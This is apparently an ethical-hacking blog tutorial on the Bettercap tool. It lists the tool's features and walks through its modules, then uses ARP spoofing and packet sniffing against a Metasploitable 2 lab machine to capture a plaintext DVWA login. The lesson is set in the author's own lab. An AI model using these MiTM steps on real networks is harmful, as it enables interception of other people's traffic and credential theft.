Hello, aspiring ethical hackers. In our previous blogpost, you learnt about Man in The Middle (MiTM) attack. In this article, you will learn about Bettercap, a network reconnaissance and MiTM attack tool.
What is Bettercap?
Bettercap is a powerful, easily extensible and portable framework written in GO programming language, that is useful to security researchers, Red teamers and reverse engineers in performing reconnaissance and MiTM attacks. It is known as Swiss Army knife for 802.11, BLE, IPV4 and IPV6 network reconnaissance and MiTM attacks. Its features include,
- Performing WiFi network scanning, de-authentication attacks, clientless PMKID association attack and automatic WPA/WPA2/WPA3 client handshakes capture.
- Bluetooth Low Energy devices scanning, characteristics enumeration, reading and writing.
- 2.4Ghz wireless devices scanning and MouseJacking attacks with over-the-air HID frames injection (with DuckyScript support).
- CAN-bus and DBC support for decoding, injecting and fuzzing frames.
- Passive and active IP network hosts probing and recon.
- ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4 and IPv6 based networks.
- Proxies at packet level, TCP level and HTTP/HTTPS application level fully scriptable with easy to implement javascript plugins.
- A powerful network sniffer for credentials harvesting which can also be used as a network protocol fuzzer.
- A very fast port scanner.
- A powerful REST API with support for asynchronous events notification on websocket to orchestrate your attacks easily.
- A very convenient web UI.
Let’s see how this tool works. For this, we will be using Kali Linux as attacker system as bettercap is available by default in Kali Linux’s repositories. It can be installed using command shown below. As target we will be using Metasploitable 2 . Both the systems are installed as part of our Simple hacking Lab.
bettercap
After installation, bettercap can be started as shown below. Note that it requires SUDO privileges to run.
sudo bettercap
Type “help” on the bettercap interface to learn more about it.
For this tutorial, let’s learn about how to use modules in Bettercap. Bettercap has various modules. By default, only one module is always running. This is the “events.stream” module that shows all that’s happening in bettercap.
To learn about any module all you have to do is use command shown below. For example, let’s view the help details about ‘net.probe’ module.
help <module name>
As you can see in the above image, this module detects the new hosts on the network by sending UDP packets. To start a module in bettercap, the command is given below.
<module name> on
As soon as you turn it ON, it starts probing the network for any new machines. You can see all the active bettercap modules running by using command “active”.
As you can see in the above image, these modules of bettercap are running. They are “events -stream” (which runs by default as soon as we start bettercap, “net.probe” module and “net.recon” modules.
Now, let’s do something useful with this tool. In our previous blogpost on packet sniffing, you learnt how network packets can be captured. Let’s try the same with bettercap.
For this, we start “net.sniff” module on bettercap.
Also, we will start ‘arp.spoof’ module. As you learnt in ARP spoofing, this will allow us to perform MiTM attacks.
For the novices, the “net.sniff” module performs packet sniffing while “arp-spoof” module performs ARP poisoning attack on the the target IP specified (that of Metasploitable 2).
Doing this captures all the network traffic going to or from our target system i.e Metasploitable 2. While bettercap does this, let’s login into Metasploitable 2 DVWA web app from our attacker system.
While we do this, Bettercap captures the credentials, as they are in plain text.
As you can see in the above images, both the password and username are clearly visible and successfully retrieved by this tool. Next, learn about Wireshark, a network analyzer.
Follow Us
